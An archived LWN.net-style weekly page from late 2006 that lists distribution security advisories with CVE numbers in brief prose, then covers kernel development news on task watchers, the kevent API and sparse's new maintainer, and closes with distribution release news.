Gentoo 200609-17:02 2006-09-27
rPath rPSA-2006-0174-1 2006-09-27
Gentoo 200609-17 2006-09-27

Comments (none posted)

openssl: insufficient signature checking

Package(s):openssl CVE #(s):CVE-2006-4339
Created:September 5, 2006 Updated:November 15, 2006
Description: Philip Mackenzie, Marius Schilder, Jason Waddle and Ben Laurie of Google Security discovered that the OpenSSL library did not sufficiently check the padding of PKCS #1 v1.5 signatures if the exponent of the public key is 3 (which is widely used for CAs). This could be exploited to forge signatures without the need of the secret key.
Alerts:
Mandriva MDKSA-2006:207 2006-11-14
Slackware SSA:2006-310-01 2006-11-07
OpenPKG OpenPKG-SA-2006.029 2006-11-06
SuSE SUSE-SA:2006:061 2006-10-19
Slackware SSA:2006-257-02 2006-09-15
Gentoo 200609-05:02 2006-09-07
Debian DSA-1174-1 2006-09-11
Debian DSA-1173-1 2006-09-10
Red Hat RHSA-2006:0661-01 2006-09-06
Gentoo 200609-05 2006-09-07
Mandriva MDKSA-2006:161 2006-09-06
rPath rPSA-2006-0163-1 2006-09-05
OpenPKG OpenPKG-SA-2006.018 2006-09-06
Fedora FEDORA-2006-953 2006-09-05
Ubuntu USN-339-1 2006-09-05

Comments (none posted)

openssl: multiple vulnerabilities

Package(s):openssl CVE #(s):CVE-2006-2937 CVE-2006-2940 CVE-2006-3780 CVE-2006-4343 CVE-2006-3738
Created:September 28, 2006 Updated:December 12, 2006
Description: OpenSSL has a number of denial of service vulnerabilities including: two vulnerabilities involving invalid ASN.1 structures, a buffer overflow in the SSL_get_shared_ciphers() function and an SSLv2 client crash that can be caused by a malicious server.
Alerts:
Gentoo 200612-11 2006-12-11
Gentoo 200610-11 2006-10-24
Debian DSA-1195-1 2006-10-10
SuSE SUSE-SR:2006:024 2006-10-06
Ubuntu USN-353-2 2006-10-04
Mandriva MDKSA-2006:178 2006-10-02
Mandriva MDKSA-2006:177 2006-10-02
Mandriva MDKSA-2006:172-1 2006-10-02
Debian DSA-1185-2 2006-10-02
rPath rPSA-2006-0175-2 2006-09-28
Fedora FEDORA-2006-1004 2006-09-28
Trustix TSLSA-2006-0054 2006-09-29
Slackware SSA:2006-272-01 2006-09-29
rPath rPSA-2006-0175-1 2006-09-28
Red Hat RHSA-2006:0695-01 2006-09-28
Mandriva MDKSA-2006:172 2006-09-28
Debian DSA-1185-1 2006-09-28
Ubuntu USN-353-1 2006-09-28
SuSE SUSE-SA:2006:058 2006-09-28
OpenPKG OpenPKG-SA-2006.021 2006-09-28

Comments (none posted)

php: several vulnerabilities

Package(s):php CVE #(s):CVE-2006-4481 CVE-2006-4484 CVE-2006-4485
Created:September 8, 2006 Updated:June 13, 2008
Description: The file_exists and imap_reopen functions in PHP before 5.1.5 do not check for the safe_mode and open_basedir settings, which allows local users to bypass the settings (CVE-2006-4481).

A buffer overflow in the LWZReadByte function in ext/gd/libgd/gd_gif_in.c in the GD extension in PHP before 5.1.5 allows remote attackers to have an unknown impact via a GIF file with input_code_size greater than MAX_LWZ_BITS, which triggers an overflow when initializing the table array (CVE-2006-4484).

The stripos function in PHP before 5.1.5 has unknown impact and attack vectors related to an out-of-bounds read (CVE-2006-4485).

Alerts:
SuSE SUSE-SR:2008:013 2008-06-13
Mandriva MDVSA-2008:077 2007-03-26
SuSE SUSE-SR:2008:005 2008-03-06
Red Hat RHSA-2008:0146-01 2008-02-28
Fedora FEDORA-2008-1643 2008-02-13
Foresight FLEA-2008-0007-1 2008-02-11
Fedora FEDORA-2008-1122 2008-02-05
Fedora FEDORA-2008-1131 2008-02-05
SuSE SUSE-SR:2008:003 2008-02-07
Mandriva MDVSA-2008:038 2007-02-07
rPath rPSA-2008-0046-1 2008-02-06
Gentoo 200802-01 2008-02-06
rPath rPSA-2006-0182-1 2006-10-05
SuSE SUSE-SA:2006:052 2006-09-21
Red Hat RHSA-2006:0669-01 2006-09-21
Mandriva MDKSA-2006:162 2006-09-07

Comments (1 posted)

phpbb2: missing input sanitizing

Package(s):phpbb2 CVE #(s):CVE-2006-1896
Created:May 22, 2006 Updated:February 11, 2008
Description: It was discovered that phpbb2, a web based bulletin board, insufficiently sanitizes values passed to the "Font Color 3" setting, which might lead to the execution of injected code by admin users.
Alerts:
Debian DSA-1066-1 2006-05-20

Comments (none posted)

phpbb2: multiple vulnerabilities

Package(s):phpbb2 CVE #(s):CVE-2005-3310 CVE-2005-3415 CVE-2005-3416 CVE-2005-3417 CVE-2005-3418 CVE-2005-3419 CVE-2005-3420 CVE-2005-3536 CVE-2005-3537
Created:December 22, 2005 Updated:February 11, 2008
Description: The phpbb2 web forum has a number of vulnerabilities including: a web script injection problem, a protection mechanism bypass, a security check bypass, a remote global variable bypass, cross site scripting vulnerabilities, an SQL injection vulnerability, a remote regular expression modification problem, missing input sanitizing, and a missing request validation problem.
Alerts:
Debian DSA-925-1 2005-12-22

Comments (none posted)

phpMyAdmin: multiple vulnerabilities

Package(s):phpmyadmin CVE #(s):CVE-2005-4079 CVE-2005-3665
Created:December 12, 2005 Updated:November 20, 2006
Description: Stefan Esser reported multiple vulnerabilities found in phpMyAdmin. The $GLOBALS variable allows modifying the global variable import_blacklist to open phpMyAdmin to local and remote file inclusion, depending on your PHP version (CVE-2005-4079, PMASA-2005-9). Furthermore, it is also possible to conduct an XSS attack via the $HTTP_HOST variable and a local and remote file inclusion because the contents of the variable are under total control of the attacker (CVE-2005-3665, PMASA-2005-8).
Alerts:
Debian DSA-1207-2 2006-11-19
Debian DSA-1207-1 2006-11-09
SuSE SUSE-SA:2006:004 2006-01-26
Gentoo 200512-03 2005-12-11

Comments (none posted)

postgresql: SQL injection

Package(s):postgresql CVE #(s):CVE-2006-2313 CVE-2006-2314
Created:May 24, 2006 Updated:June 6, 2007
Description: The PostgreSQL team has put out a set of "urgent updates" (in the form of the 7.3.15, 7.4.13, 8.0.8, and 8.1.4 releases) closing a newly-discovered set of SQL injection issues. Details about the problem can be found on the technical information page; in short: multi-byte encodings can be used to defeat normal string sanitizing techniques. The update fixes one problem related to invalid multi-byte characters, but punts on another by simply disallowing the old, unsafe technique of escaping single quotes with a backslash.
Alerts:
Fedora FEDORA-2007-0249 2007-06-06
Trustix TSLSA-2006-0059 2006-10-27
Gentoo 200607-04 2006-07-09
SuSE SUSE-SA:2006:030 2006-06-09
Ubuntu USN-288-3 2006-06-09
Ubuntu USN-288-2 2006-06-09
Mandriva MDKSA-2006:098 2006-06-07
Debian DSA-1087-1 2006-06-03
Ubuntu USN-288-1 2006-05-29
rPath rPSA-2006-0080-1 2006-05-24
Red Hat RHSA-2006:0526-02 2006-05-23
Fedora FEDORA-2006-578 2006-05-23
Fedora FEDORA-2006-579 2006-05-23

Comments (1 posted)

python: arbitrary code execution

Package(s):python CVE #(s):CVE-2006-4980
Created:October 6, 2006 Updated:November 7, 2006
Description: Benjamin C. Wiley Sittler discovered that Python's repr() function did not properly handle UTF-32/UCS-4 strings. If an application uses repr() on arbitrary untrusted data, this could be exploited to execute arbitrary code with the privileges of the python application.
Alerts:
Fedora FEDORA-2006-1049 2006-11-06
Gentoo 200610-07:02 2006-10-17
Gentoo 200610-07 2006-10-17
rPath rPSA-2006-0187-1 2006-10-10
Mandriva MDKSA-2006:181 2006-10-10
Red Hat RHSA-2006:0713-01 2006-10-09
Ubuntu USN-359-1 2006-10-06

Comments (1 posted)

quake: buffer overflow

Package(s):quake3-bin CVE #(s):CVE-2006-2236
Created:May 10, 2006 Updated:January 12, 2009
Description: Games based on the Quake 3 engine are vulnerable to a buffer overflow exploitable by a hostile game server.
Alerts:
Gentoo 200901-06 2009-01-11
Gentoo 200605-12 2006-05-10

Comments (none posted)

ruby: denial of service

Package(s):ruby CVE #(s):CVE-2006-5467
Created:October 30, 2006 Updated:December 13, 2006
Description: The CGI library in Ruby 1.8 allowed a remote attacker to cause a denial of service via an HTTP request with a multipart MIME body that contained an invalid boundary specifier, which would result in an infinite loop and CPU consumption.
Alerts:
Debian DSA-1235-1 2006-12-13
Debian DSA-1234-1 2006-12-13
Fedora FEDORA-2006-1441 2006-12-11
Fedora FEDORA-2006-1440 2006-12-11
Gentoo 200611-12 2006-11-20
Red Hat RHSA-2006:0729-01 2006-11-08
OpenPKG OpenPKG-SA-2006.030 2006-11-06
Ubuntu USN-371-1 2006-10-31
Fedora FEDORA-2006-1110 2006-10-30
Mandriva MDKSA-2006:192 2006-10-27

Comments (none posted)

screen: denial of service

Package(s):screen CVE #(s):CVE-2006-4573
Created:October 26, 2006 Updated:November 6, 2006
Description: The screen virtual terminal application has a denial of service vulnerability related to the handling of UTF-8 combining characters. If an attacker can trick a user into displaying maliciously created output, a denial of service can result. The attacker may also be able to exploit the vulnerability in order to run arbitrary software with the privileges of the user.
Alerts:
Slackware SSA:2006-307-02 2006-11-06
Gentoo 200611-01 2006-11-03
Ubuntu USN-370-1 2006-10-31
Debian DSA-1202-1 2006-10-31
Mandriva MDKSA-2006:191 2006-10-27
OpenPKG OpenPKG-SA-2006.026 2006-10-26
rPath rPSA-2006-0198-1 2006-10-26

Comments (none posted)

sendmail: denial of service

Package(s):sendmail CVE #(s):CVE-2006-1173
Created:June 15, 2006 Updated:November 1, 2006
Description: Sendmail has a vulnerability in the way it handles multi-part MIME messages. A remote attacker can create a specially crafted email message that can be used to crash the sendmail process, causing a denial of service.
Alerts:
Fedora-Legacy FLSA:195418 2006-10-29
Debian DSA-1155-2 2006-08-24
Debian DSA-1155-1 2006-08-24
rPath rPSA-2006-0134-1 2006-07-21
Fedora FEDORA-2006-837 2006-07-18
Fedora FEDORA-2006-836 2006-07-18
Gentoo 200606-19 2006-06-15
SuSE SUSE-SA:2006:032 2006-06-14
Slackware SSA:2006-166-01 2006-06-15
Red Hat RHSA-2006:0515-01 2006-06-14
Mandriva MDKSA-2006:104 2006-06-14

Comments (none posted)

shadow-utils: mailbox creation vulnerability

Package(s):shadow-utils CVE #(s):CVE-2006-1174
Created:May 25, 2006 Updated:June 12, 2007
Description: The useradd tool from the shadow-utils package has a potential security problem. When a new user's mailbox is created, the permissions are set to random garbage from the stack, potentially allowing the file to be read or written during the time before fchmod() is called.
Alerts:
Red Hat RHSA-2007:0431-01 2007-06-11
rPath rPSA-2007-0096-1 2007-05-11
Red Hat RHSA-2007:0276-02 2007-05-01
Gentoo 200606-02 2006-06-07
Mandriva MDKSA-2006:090 2006-05-24

Comments (none posted)

texinfo: temporary file vulnerability

Package(s):texinfo CVE #(s):CAN-2005-3011
Created:October 5, 2005 Updated:November 9, 2006
Description: Texinfo prior to version 4.8-r1 suffers from a temporary file vulnerability.
Alerts:
Ubuntu USN-194-2 2006-01-09
Fedora FEDORA-2005-991 2005-10-14
Fedora FEDORA-2005-990 2005-10-14
Mandriva MDKSA-2005:175 2005-10-06
Ubuntu USN-194-1 2005-10-06
Gentoo 200510-04 2005-10-05

Comments (none posted)

tin: buffer overflow

Package(s):tin CVE #(s):CVE-2006-0804
Created:February 19, 2006 Updated:November 24, 2006
Description: An allocation off-by-one bug exists in the TIN news reader version 1.8.0 and earlier which can lead to a buffer overflow.
Alerts:
Gentoo 200611-18 2006-11-24
OpenPKG OpenPKG-SA-2006.005 2006-02-19

Comments (none posted)

unzip: long file name buffer overflow

Package(s):unzip CVE #(s):CVE-2005-4667
Created:February 6, 2006 Updated:May 2, 2007
Description: A buffer overflow in UnZip 5.50 and earlier allows local users to execute arbitrary code via a long filename command line argument. NOTE: since the overflow occurs in a non-setuid program, there are not many scenarios under which it poses a vulnerability, unless unzip is passed long arguments when it is invoked from other programs.
Alerts:
Red Hat RHSA-2007:0203-02 2007-05-01
Fedora-Legacy FLSA:180159 2006-04-04
Debian DSA-1012-1 2006-03-21
Mandriva MDKSA-2006:050 2006-02-27
Ubuntu USN-248-2 2006-02-15
Ubuntu USN-248-1 2006-02-13
Fedora FEDORA-2006-098 2006-02-06

Comments (1 posted)

w3c-libwww: possible stack overflow

Package(s):w3c-libwww CVE #(s):CVE-2005-3183
Created:October 14, 2005 Updated:May 2, 2007
Description: xtensive testing of libwww's handling of multipart/byteranges content from HTTP/1.1 servers revealed multiple logical flaws and bugs in Library/src/HTBound.c
Alerts:
Red Hat RHSA-2007:0208-02 2007-05-01
Ubuntu USN-220-1 2005-12-01
Mandriva MDKSA-2005:210 2005-11-09
Fedora FEDORA-2005-953 2005-10-07
Fedora FEDORA-2005-952 2005-10-07

Comments (1 posted)

wireshark: several vulnerabilities

Package(s):wireshark CVE #(s):CVE-2006-4330 CVE-2006-4331 CVE-2006-4332 CVE-2006-4333
Created:August 25, 2006 Updated:November 2, 2006
Description: There are multiple problems in Wireshark, versions 0.7.9 to 0.99.2.
Alerts:
Red Hat RHSA-2006:0658-01 2006-09-12
Debian DSA-1171-1 2006-09-07
Gentoo 200608-26 2006-08-29
Fedora FEDORA-2006-936 2006-08-25
Mandriva MDKSA-2006:152 2006-08-25
rPath rPSA-2006-0158-1 2006-08-25

Comments (none posted)

WordPress: multiple vulnerabilities

Package(s):wordpress CVE #(s):CVE-2006-5705
Created:October 30, 2006 Updated:November 17, 2006
Description: This vendor announcement identifies several vulnerabilities in WordPress versions prior to 2.0.5.
Alerts:
Gentoo 200611-10 2006-11-17
OpenPKG OpenPKG-SA-2006.027 2006-10-30

Comments (2 posted)

xine-lib: code execution

Package(s):xine-lib CVE #(s):CVE-2006-4799
Created:October 4, 2006 Updated:November 21, 2006
Description: The xine-lib package does not properly validate AVI headers, enabling an attacker to run arbitrary code via a specially crafted AVI file.
Alerts:
Debian DSA-1215-1 2006-11-20
Ubuntu USN-358-1 2006-10-04

Comments (none posted)

xine-lib: buffer overflow

Package(s):xine-lib CVE #(s):CVE-2006-1664
Created:April 27, 2006 Updated:February 27, 2008
Description: xine-lib does an improper input data boundary check on MPEG streams. A specially crafted MPEG file can be created that can cause arbitrary code execution when the file is accessed.
Alerts:
Gentoo 200802-12 2008-02-26
Gentoo 200604-16 2006-04-26

Comments (none posted)

xine-ui: format string vulnerabilities

Package(s):xine-ui CVE #(s):CVE-2006-2230
Created:June 9, 2006 Updated:January 24, 2007
Description: Several format string vulnerabilities have been discovered in xine-ui, the user interface of the xine video player, which may cause a denial of service.
Alerts:
Gentoo 200701-18 2007-01-23
Debian DSA-1093-1 2006-06-08

Comments (none posted)

xinit: race condition

Package(s):xinit CVE #(s):CVE-2006-5214
Created:October 17, 2006 Updated:August 9, 2007
Description: A race condition allows local users to see error messages generated during another user's X session. This could allow potentially sensitive information to be leaked.
Alerts:
Fedora FEDORA-2007-659 2007-08-08
Fedora FEDORA-2007-1409 2007-08-02
Ubuntu USN-364-1 2006-10-16

Comments (1 posted)

X.org: local privilege escalations

Package(s):xorg-x11 CVE #(s):CVE-2006-4447
Created:August 28, 2006 Updated:April 30, 2007
Description: Several X.org libraries and X.org itself contain system calls to set*uid() functions, without checking their result. Local users could deliberately exceed their assigned resource limits and elevate their privileges after an unsuccessful set*uid() system call. This requires resource limits to be enabled on the machine.
Alerts:
Gentoo 200704-22 2007-04-27
Mandriva MDKSA-2006:160 2006-08-31
Gentoo 200608-25 2006-08-28

Comments (none posted)

X.Org: buffer overflow

Package(s):xorg-x11-server xorg-x11 CVE #(s):CVE-2006-1526
Created:May 3, 2006 Updated:January 10, 2007
Description: There is a buffer overflow in the Xrender extension of the X.Org server; any process which is able to connect to the server may be able to exploit this overflow to run arbitrary code. Since the X server runs as root on most systems, this vulnerability could be exploited to gain root access. See the X.Org advisory for more information.
Alerts:
Fedora-Legacy FLSA:190777 2006-06-06
Trustix TSLSA-2006-0024 2006-05-05
Mandriva MDKSA-2006:081-1 2006-05-04
Ubuntu USN-280-1 2006-05-04
Slackware SSA:2006-123-01 2006-05-04
Red Hat RHSA-2006:0451-01 2006-05-04
SuSE SUSE-SA:2006:023 2006-05-03
Mandriva MDKSA-2006:081 2006-05-02
Gentoo 200605-02 2006-05-02

Comments (none posted)

xorg-x11: privilege escalation

Package(s):xorg-x11 xfree86 CVE #(s):CVE-2006-3739 CVE-2006-3740
Created:September 12, 2006 Updated:December 14, 2006
Description: iDefense reported two integer overflow flaws in the way the X.org server processed CID font files. A malicious authorized client could exploit this issue to cause a denial of service (crash) or potentially execute arbitrary code with root privileges on the X.org server.
Alerts:
Mandriva MDKSA-2006:164-2 2006-12-14
Mandriva MDKSA-2006:164-1 2006-11-17
Debian DSA-1193-1 2006-10-09
SuSE SUSE-SR:2006:023 2006-09-27
Slackware SSA:2006-259-01 2006-09-18
Mandriva MDKSA-2006:164 2006-09-14
Gentoo 200609-07 2006-09-13
Ubuntu USN-344-1 2006-09-12
Red Hat RHSA-2006:0666-01 2006-09-12
Red Hat RHSA-2006:0665-01 2006-09-12
rPath rPSA-2006-0167-1 2006-09-12

Comments (none posted)

xpdf: buffer overflow

Package(s):xpdf CVE #(s):CAN-2005-0064
Created:January 19, 2005 Updated:March 15, 2007
Description: iDEFENSE has found yet another xpdf buffer overflow; see this advisory for details.
Alerts:
Fedora FEDORA-2007-1219 2007-03-14
Gentoo 200506-06 2005-06-09
Red Hat RHSA-2005:026-01 2005-03-16
Red Hat RHSA-2005:066-01 2005-02-15
Red Hat RHSA-2005:057-01 2005-02-15
Red Hat RHSA-2005:053-01 2005-02-15
Red Hat RHSA-2005:034-01 2005-02-15
Fedora-Legacy FLSA:2353 2005-02-10
Fedora-Legacy FLSA:2352 2005-02-10
Gentoo 200502-10 2005-02-09
Red Hat RHSA-2005:049-01 2005-02-01
SuSE SUSE-SR:2005:002 2005-01-26
Red Hat RHSA-2005:059-01 2005-01-26
Mandrake MDKSA-2005:020 2005-01-25
Mandrake MDKSA-2005:019 2005-01-25
Mandrake MDKSA-2005:016 2005-01-25
Mandrake MDKSA-2005:021 2005-01-25
Mandrake MDKSA-2005:018 2005-01-25
Mandrake MDKSA-2005:017 2005-01-25
Fedora FEDORA-2005-061 2005-01-25
Fedora FEDORA-2005-062 2005-01-25
Fedora FEDORA-2005-059 2005-01-25
Fedora FEDORA-2005-060 2005-01-25
Conectiva CLA-2005:921 2005-01-25
Fedora FEDORA-2004-049 2005-01-24
Fedora FEDORA-2004-048 2005-01-24
Gentoo 200501-32 2005-01-23
Gentoo 200501-31 2005-01-23
Gentoo 200501-30 2005-01-22
Gentoo 200501-28 2005-01-21
Fedora FEDORA-2005-052 2005-01-20
Fedora FEDORA-2005-051 2005-01-20
Ubuntu USN-64-1 2005-01-19
Debian DSA-645-1 2005-01-19
Debian DSA-648-1 2005-01-19

Comments (1 posted)

xpdf: integer overflows

Package(s):xpdf, poppler, cupsys, tetex-bin CVE #(s):CVE-2005-3624 CVE-2005-3625 CVE-2005-3626 CVE-2005-3627
Created:January 5, 2006 Updated:November 30, 2006
Description: xpdf has a number of integer overflows. A remote attacker can trick a user into opening a maliciously crafted pdf file, allowing the attacker to execute code with the privileges of the local user. This also affects the Poppler library, cupsys and tetex-bin.
Alerts:
Fedora FEDORA-2006-1220 2006-11-30
Debian DSA-932-1 2006-01-09
Debian DSA-931-1 2006-01-09
Ubuntu USN-236-2 2006-01-09
Mandriva MDKSA-2006:008 2006-01-06
Mandriva MDKSA-2006:006 2006-01-05
Mandriva MDKSA-2006:005 2006-01-05
Mandriva MDKSA-2006:004 2006-01-05
Mandriva MDKSA-2006:003 2006-01-05
Ubuntu USN-236-1 2006-01-05

Comments (none posted)

xsupplicant: stack overflow

Package(s):xsupplicant CVE #(s):
Created:October 30, 2006 Updated:November 1, 2006
Description: Yannick Van Osselaer discovered a stack overflow in Xsupplicant, which could potentially be exploited by a remote, authenticated user to gain root privileges.
Alerts:
Mandriva MDKSA-2006:189 2006-10-27

Comments (none posted)

Page editor: Jonathan Corbet

Kernel development

Brief items

Kernel release status

The current 2.6 prepatch is 2.6.19-rc5, released by Linus on November 7. It contains another pile of fixes, many of them in architecture-specific code; the long-format changelog has the details. Linus says "there may be a -rc6, but maybe we don't even need one."

Adrian Bunk calls those "famous last words" in his 2.6.19-rc5 known regressions list.

The current -mm tree is 2.6.19-rc5-mm1. Recent changes to -mm include the latest kevent code (see below), the kernel virtual machine patch set, and some big updates to the high-resolution timer and dynamic tick code - which still has some problems.

The current stable 2.6 release is 2.6.18.2, released on November 3. Once again, quite a long list of patches has been merged into this release.

On the 2.6.16 front, 2.6.16.30 was released on November 3, followed by 2.6.16.31 on November 7. Between these two releases quite a few bugs have been fixed, including several which are security-related.

For 2.4 users, 2.4.34-pre5 came out on November 4. The first 2.4.34 release candidate is expected before too long.

Comments (none posted)

Kernel development news

OSDL to fund a kernel tech writer

It took a long time to come about, but it has happened: OSDL has pulled together the money to fund a technical writer to work on kernel documentation for a year. The job posting is available on the net for anybody who might be interested in applying.

Full Story (comments: 25)

Task watchers

One of the more complicated core kernel functions is copy_process(), in kernel/fork.c. This routine is the heart of the fork() and clone() system calls; it must create a coherent copy of a running process, bearing in mind the various clone flags which are present. There are sixteen different goto labels for error exits. This is clearly a place where a lot of things can go wrong.

It is also an operation of interest to many other kernel subsystems. A look at copy_process() reveals hooks for task delay accounting, auditing, the process fork connector, SYSV semaphore undo information management, NUMA memory policy enforcement, cpuset maintenance, keyring management, and more. Many of these subsystems want to know about other events in the process lifecycle as well, with the result that hooks are placed all over the process code. It might just be nice to have a cleaner solution to the problem of learning about process-related events.

That cleaner solution would appear to be present in the form of Matt Helsley's task watchers patch set, currently in its second major iteration. This patch takes an interesting approach to providing what is essentially just another notifier interface in order to minimize overhead in a performance-critical part of the kernel.

In this patch, a "task watcher" is a function which is notified whenever an interesting process event takes place. Watchers have this prototype:

    int my_watcher(unsigned long info, struct task_struct *tsk);

When the watcher function is called, info will have additional information for the specific event, and tsk points to the process generating the event. Arranging for a task watcher to be called is a simple matter of adding a declaration like the following:

    task_watcher_func(event, function);

Where event is the event of interest, and function is the task watcher function to be called in response to that event. The possible events are:

  • init: a process is first created; info is the set of flags passed to clone().

  • clone: a process forks; info is the set of clone() flags. Note that this watcher appears to be called with the child process; it differs from init in that it is called toward the end of copy_process(), when creation of the new process is complete.

  • exec: a process executes a new program; info is zero.

  • uid: a process changes its real or effective UID; info is zero.

  • gid: a process changes its real or effective GID; info is zero.

  • exit: a process dies; info is the exit code.

  • free: a process's task structure is being freed; info is the exit code.

The task_watcher_func() macro creates a pointer to the watcher function in a special ELF section. There is a separate section for each watched-for event; when such an event is signaled, the watcher code simply iterates through each function found in the relevant executable section. There are a couple of implications resulting from this mechanism: task watchers exist for the life of the system (they cannot be registered and unregistered), and they cannot be located in loadable modules (though this restriction will eventually go away).

One might well wonder why things were done this way, rather than using a simple notifier list. Your editor wondered, and asked Mr. Helsley about it. The problem is that process creation is a performance-critical part of the kernel, and any change which increases process fork time tends to get a lot of scrutiny. Fork times are measured by a number of benchmarks; quick process creation is also important in fork-heavy loads. Since kernel compilation can require a lot of forks, there is an especially strong incentive to keep it fast.

If a notifier list is used with watchers, some sort of locking is required to keep that list from being corrupted when watchers come and go. The separate ELF sections, instead, are read-only structures created at kernel build time. So they impose less overhead on the process lifecycle and, thus, are less likely to bother kernel developers who, perhaps, are not really interested in the watcher functionality.

Comments (none posted)

This week's version of the kevent interface

The proposed kevent interface was last covered here in August. This new API, which seeks to provide a single interface for applications to received events of interest, has been under development for the better part of a year now. It continues to evolve, so, in celebration of the version 23 kevent patch, another look is called for.

Parts of the interface remain relatively stable. So, the main multiplexer system call remains:

    int kevent_ctl(int fd, unsigned int cmd, unsigned int num,
                   struct ukevent *arg);

The functions performed by this call are reduced in number, however. It is no longer used to create the kevent file descriptor in the first place; instead, an open of /dev/kevent is called for. But kevent_ctl() is still the place to add events of interest, and to remove and modify them.

The synchronous interface for waiting for events is also pretty much as it has been for a little while:

    int kevent_get_events(int fd, unsigned int min_nr, unsigned int max_nr,
                          __u64 timeout, struct ukevent *buf, 
			  unsigned flags);

This system call will wait until at least min_nr events are ready for consumption, then copy up to max_nr completed events into buf. The call will return early, however, if timeout nanoseconds pass before min_nr events are signaled. The current documentation for kevents says that an indefinite wait can be had by passing -1 for timeout - slightly strange, given that timeout is an unsigned quantity. It would not be surprising to see some sort of KEVENT_WAIT_FOREVER value defined for that purpose instead.

The biggest changes can be found in the kevent ring buffer code which, last time we looked, was rather awkward to use. The previous implementation also placed the ring buffer in nailed-down kernel memory, potentially opening the system up to denial of service problems. So, in the new implementation, the ring buffer is kept entirely in user space. The application simply allocates an array of the desired size with the following type:

    struct kevent_ring
    {
	unsigned int		ring_kidx;
	struct ukevent		event[0];
    };

The actual number of events to be stored in the ring is determined by the application. The kevent subsystem must be told about this ring with:

    int kevent_ring_init(int fd, struct kevent_ring *ring, 
                         unsigned int num);

where num is the number of ukevent structures in the ring. This call will remember the ring's address and size, and set ring_kidx - the index of the entry where the kernel will store the next completed event - to zero.

There are a few things to be aware of when working with the kevent ring. One is that there is no place in this data structure to track which event the application should consume next; the application must store that index elsewhere. There also appears to be no way to disconnect or resize the ring buffer without simply closing the event file descriptor and starting over; an attempt to replace one ring with another will fail. Finally, the application must tell the kernel to put events into the ring with:

    int kevent_wait(int fd, unsigned int num, __u64 timeout);

This system call will wait until at least one event is available, then copy up to num events into the ring buffer. Once the events are copied, the kernel considers them to be consumed and will forget about them (or requeue them if the event so requests). The application can work through the events at leisure - stopping before hitting the current ring_kidx value - with no further system calls required.

The current API seems to have made most of the people who are paying attention happy - though it has been a little while since Ulrich Drepper, an important player, has chimed in. In the past, he has been unhappy about the timeout parameter (preferring that the interface use an absolute timespec value rather than a relative value). Ulrich has also suggested that the blocking system calls could use a version which specifies an event mask, much like the recently added ppoll() and pselect() system calls. He points out that, while it is possible to receive signals as kevents, some applications will certainly still use traditional signals, with their traditional atomicity problems.

So there may be a few remaining issues to take care of before the kevent API is merged into the mainline kernel - and consequently set in stone. But there is apparent progress in that direction, and the number of developers showing interest in this API appears to be on the increase. It may not be too many more kernel cycles before Linux has a unified event interface of its very own.

Comments (2 posted)

Sparse gets a maintainer

The "sparse" utility has long been one of Linux's best-kept secrets. It is a static analysis tool which can find a wide variety of bugs in the kernel code base; sparse is a useful tool, but it can be surprisingly hard to find. It has never had a web page, and almost no distributions package it. Interested users must, instead, track down the git tree or Dave Jones's snapshot directory.

Sparse was originally written by Linus Torvalds, but he has not done much with it for a while, and he recently suggested that somebody else should take it over:

Anyway, I suspect it would be better if people didn't consider me the maintainer for sparse, simply because it does the things I really cared about, and as a result I'm not really very active.

As a result of this discussion, sparse has a new maintainer: Josh Triplett. Josh started things off with sparse 0.1, the first-ever sparse release with a version number. He has set up a new git tree for sparse, and, even, a sparse web page.

Josh was kind enough to answer some questions posed by your editor. It turns out that he has been working with sparse for a while; it was part of his PhD work, where he enhanced it to be able to verify proper use of the read-copy-update (RCU) primitives. That work continued at IBM over the summer, where he was able to work on RCU verification with Paul McKenney.

As a result, his first priority for sparse in the near future is the continuation of the RCU work. This effort is also expanding into locking verification in general; some of the necessary annotations and resulting fixes have gone into the 2.6.18 and 2.6.19-rc kernels. Josh also plans to work on the elimination of false positives and on noise reduction in general. Then, there's various patches from other developers which have been floating around for a while and really need to be merged into the sparse mainline.

In terms of project management, Josh says:

I plan to continue making regular Sparse releases, and I'd like to get Sparse packaged in various distributions, at least in their "experimental" sections or equivalent. Any potential distribution packagers, feel free to join the linux-sparse list, and let me know what I can do to help or to get things going more smoothly.

Getting sparse into distributions could only help increase its use - and bring about a corresponding reduction in bugs in shipped code. This will be especially true if Josh succeeds in another one of his goals: expanding sparse usage beyond the kernel into user-space projects. X.org seems like it could be an early sparse adopter.

Longer-term, Josh wants to look at more advanced techniques which can look at larger chunks of a program and find potential bugs. Part of this effort will require attracting other researchers interested in static analysis to the sparse platform. Says Josh:

I feel that several classes of bugs exist in the Linux kernel and in userspace code which simply should not exist, because the tools exist to find and eliminate almost all of them. This includes bugs like "scheduling while atomic", __init-related bugs, errors on error paths, and many locking-related bugs.

One can only imagine that free software users all over are wishing Josh the best of luck in his effort to track down and get rid of all those unnecessary bugs.

Comments (8 posted)

Patches and updates

Kernel trees

Core kernel code

Development tools

Device drivers

Filesystems and block I/O

Memory management

Networking

Architecture-specific

Security-related

Virtualization and containers

Miscellaneous

Page editor: Jonathan Corbet

Distributions

News and Editorials

Get more Science into your Distribution

There are a number of specialty distributions with scientific applications. Generally they come as live CDs with a few handpicked applications, like the Quantian Scientific Computing Environment, or BioBrew Linux. What if you want a broader range of scientific applications? The packages are there, maybe in your distribution's repositories already; but if you just want to get going without spending a lot of time with {emerge, yum, apt-get, conary, etc.} there are two distribution specific efforts to make it easy.

Mandriva is joining with Scilab, a consortium managed by INRIA (French National Institute for Research in Computer Science and Control). According this announcement, the Scilab open source numerical computation platform will be integrated into Mandriva Linux 2007 (Discovery, Powerpack and Powerpack+) editions.

Ubuntu 6.06 LTS users looking for more scientific applications will want to take a look at Scibuntu. Scibuntu is a script that adds scientific programs and other tools to your Ubuntu desktop. Most of these programs are already out there in the Ubuntu repositories, but Scibuntu collects them for you and puts them into your computer and fetches a few more from other places.

Comments (19 posted)

New Releases

andLinux Prebeta based on Ubuntu

andLinux has released PreBeta, based on Ubuntu's Edgy Eft. andLinux is a complete Linux system designed for developing applications and runs seamlessly in Windows 2000 based systems using CoLinux. The PreBeta features many updates and enhancements over the previous "Proof of Concent" version. Click below for details.

Full Story (comments: 1)

Debian GNU/Linux 3.1 updated

The Debian project has announced the fourth update of its stable distribution Debian GNU/Linux 3.1 (codename `sarge'). "This update mainly adds corrections for security problems to the stable release, along with a few adjustment to serious problems. Those who frequently update from security.debian.org won't have to update many packages and most updates from security.debian.org are included in this update."

Full Story (comments: none)

New distribution: gNewSense 1.0

